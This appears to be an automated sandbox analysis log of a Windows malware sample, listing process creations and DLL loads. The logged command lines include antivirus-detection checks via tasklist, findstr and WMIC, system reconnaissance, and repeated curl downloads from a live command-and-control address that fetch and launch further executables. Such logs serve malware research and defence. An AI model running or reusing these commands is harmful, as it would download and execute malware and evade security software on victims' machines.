Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\curl.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Trees Trees.bat & Trees.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139918
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SyntaxMilesImperialTriple" Credits
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Asked + ..\Leaving + ..\During + ..\Chairman + ..\Bracket + ..\Label + ..\Perhaps v
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139918\Ur.pif Ur.pif v
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\807 2>&1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\807 > C:\Users\user\AppData\Local\temp\237
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jrdip" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxjyu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dhmio" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fprwf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nhrsa" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\rrmou" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fofqx" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxfdn" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gvhdi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\agadw" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\mncym" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lyvbm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dxmcp" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\oqsxp" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzizi" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qfmnd" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fbswm" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\nefne" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\zxjrd" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fntgj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jyffr" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\wbqtj" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\vqMMwqCFZQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\139918\Ur.pifSection loaded: edputil.dllJump to behavior
